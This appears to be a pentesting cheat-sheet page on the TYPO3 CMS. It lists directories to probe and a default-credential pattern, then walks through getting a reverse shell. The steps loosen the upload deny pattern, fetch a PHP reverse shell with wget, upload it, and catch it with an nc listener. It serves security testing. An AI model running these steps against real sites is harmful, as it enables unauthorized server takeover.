TYPO3 Pentesting

WordPress Pentesting

Framework

AJP (Apache JServ Protocol) Pentesting

Angular Pentesting

Apache Struts Pentesting

Django Pentesting

Flask Jinja2 Pentesting

Python Pickle RCE

Ruby on Rails Pentesting

Spring Cloud Function RCE

Spring Pentesting

Tornado Pentesting

Werkzeug Pentesting

Template Engine

JsRender Template Injection

Pug Pentesting

API

API Pentesting

GraphQL Pentesting

Cloud

AWS (Amazon Web Services) Pentesting

Spring Cloud Function RCE

Microsoft

Microsoft Exchange Server Pentesting

Tool

Add Custom HTTP Headers in Burp Suite

Automate Sequence Requests with Burp Intruder

Burp Suite Troubleshooting

File Upload Attack on Exiftool

How to Use OWASP ZAP

Integrate Burp Request and SQLmap

SOCKS Proxy in Burp Suite

Turbo Intruder in Burp Suite

Others

Apache ActiveMQ Pentesting

Apache Tomcat Pentesting

Apache Zeppelin Pentesting

Atlassian Confluence Pentesting

Bookmarklet Attack

Broken Link Hijacking

Browser in the Browser (BITB) Attack

CGI Pentesting

Cacti Pentesting

Captcha Bypass with OCR

ClipBucket Pentesting

Code Deobfuscation

Codiad Pentesting

Dompdf RCE

Dump Git Repository from Website

Extract Web Browser Passwords

GhostScript Pentesting

Go SSTI

Grafana Pentesting

HTML Smuggling

HashiCorp Consul Pentesting

Icinga Web Pentesting

JBOSS Pentesting

JWT (Json Web Token) Pentesting

Java RMI Pentesting

Jenkins Pentesting

LimeSurvey Pentesting

Log4j Pentesting

OpenCATS Pentesting

PHP RCE Cheat Sheet

PHP Srand Time Abusing

PHP hash_hmac Bypass

Restaurant Management System (RMS) Pentesting

TeamCity Pentesting

Tiny File Manager Pentesting

Web Browser Settings for Pentesting

Web PHP Pentesting

WebAnno Pentesting

WebDAV Pentesting

WebSocket Pentesting

Webmin Pentesting

TYPO3 Pentesting

Last modified: 2022-12-01

TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS.

Directory Discovery

/fileadmin/
/typo3/
/typo3conf/
/typo3temp/

Default Credentials

admin:<password-specified-when-installed>

Reverse Shell (Admin Credential Required)

First, to check and edit the configuration of the uploaded file extension, go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”.
Update the configuration if necessary. For example, remove “php[1-9]?”

\.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$

Next, prepare the payload for reverse shell named “shell.php”.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.
Now you need to open listener for getting the shell.

nc -lvnp 4444

Then access to “/fileadmin/shell.php”. You should get the shell.

Method

Security Risk

Cookie

CMS

Framework

Template Engine

API

Cloud

Microsoft

Tool

Others

TYPO3 Pentesting

Directory Discovery

Default Credentials

Reverse Shell (Admin Credential Required)

ON THIS PAGE